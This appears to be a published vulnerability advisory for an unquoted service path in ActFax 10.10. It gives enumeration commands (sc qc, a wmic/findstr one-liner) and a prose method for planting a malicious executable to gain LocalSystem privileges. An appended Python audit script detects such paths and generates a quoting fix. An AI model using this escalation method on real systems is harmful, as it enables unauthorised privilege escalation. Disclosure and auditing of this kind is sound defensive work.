<pre><code># Exploit Title: ActFax 10.10 - Unquoted Service Path<br /># Date: 22/03/2023<br /># Exploit Author: Birkan ALHAN (@taftss)<br /># Vendor Homepage: https://www.actfax.com<br /># Software Link: https://www.actfax.com/en/download.html<br /># Version: Version 10.10, Build 0551 (2023-02-01)<br /># Tested on: Windows 10 21H2 OS Build 19044.2728<br /><br /># Discovering the unquoted service path:<br /><br />C:\Users\taftss>sc qc ActiveFaxServiceNT<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ActiveFaxServiceNT<br />TYPE : 10 WIN32_OWN_PROCESS<br />START_TYPE : 2 AUTO_START<br />ERROR_CONTROL : 1 NORMAL<br />BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe<br />LOAD_ORDER_GROUP :<br />TAG : 0<br />DISPLAY_NAME : ActiveFax-Server-Service<br />DEPENDENCIES :<br />SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\taftss>systeminfo<br /><br />Host Name: RedsTaftss<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19044 N/A Build 19044<br /><br /># Another method of discovering unquoted service paths:<br /><br />wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br /># Exploit:<br /><br />If an attacker has taken over the system and the compromised user has write<br />privileges to the "C:\Program Files\ActiveFax" folder or to "C:\", they<br />can place their own malicious "ActSrvNT.exe" file there. The<br />ActiveFaxServiceNT service can then be restarted to escalate privileges.<br /><br />--<br />*Birkan ALHAN*<br /><br /></code></pre>
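Added example, not part of the ESET or the ActFax advisory: a Python audit that parses `sc qc` output, reports whether the image path is unquoted and contains spaces, and generates the `sc config ... binPath=` command that quotes it. Applied to the two `sc qc` outputs on this page it flags ActiveFaxServiceNT; the ESET BINARY_PATH_NAME shown earlier is enclosed in quotes, which the check treats as safe. The field values below are copied from those outputs.

```python
import re

# sc qc output from the two advisories on this page, abridged to the fields used.
SC_QC_ACTFAX = r"""
SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
SERVICE_START_NAME : LocalSystem
"""
SC_QC_ESET = r"""
SERVICE_NAME: ekrn
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"
SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(r"^\s*(?P<key>[A-Z_]+)\s*:\s*(?P<val>.*?)\s*$", re.M)


def parse_sc_qc(text: str) -> dict:
    """KEY -> value for every 'KEY : value' line of sc qc output."""
    return {m["key"]: m["val"] for m in FIELD.finditer(text)}


def image_path(binary_path_name: str):
    """Split BINARY_PATH_NAME into (image path, was_quoted, trailing arguments).
    A quoted value is unambiguous. An unquoted one is taken up to the first
    '.exe' token; whatever follows is treated as arguments."""
    v = binary_path_name.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        if end < 0:
            return v[1:], True, ""
        return v[1:end], True, v[end + 1:]
    m = re.match(r"(?i)(.+?\.exe)(?=\s|$)(.*)", v)
    return (m.group(1), False, m.group(2)) if m else (v, False, "")


def is_unquoted_with_spaces(binary_path_name: str) -> bool:
    """The misconfiguration: no surrounding quotes and a space somewhere in the path."""
    path, quoted, _ = image_path(binary_path_name)
    return (not quoted) and (" " in path)


def audit(sc_qc_text: str) -> dict:
    """Finding for one service, with the quoting fix when the path is vulnerable."""
    cfg = parse_sc_qc(sc_qc_text)
    path, quoted, args = image_path(cfg["BINARY_PATH_NAME"])
    finding = {"service": cfg["SERVICE_NAME"], "path": path, "quoted": quoted,
               "runs_as": cfg.get("SERVICE_START_NAME", ""),
               "vulnerable": is_unquoted_with_spaces(cfg["BINARY_PATH_NAME"])}
    if finding["vulnerable"]:
        # Remediation: rewrite the value with embedded quotes. sc requires the
        # space after 'binPath='; the outer quotes are for the command shell.
        finding["fix"] = f'sc config {cfg["SERVICE_NAME"]} binPath= "\\"{path}\\"{args}"'
    return finding


if __name__ == "__main__":
    for text in (SC_QC_ACTFAX, SC_QC_ESET):
        f = audit(text)
        print(f["service"], "VULNERABLE" if f["vulnerable"] else "ok", f.get("fix", ""))
```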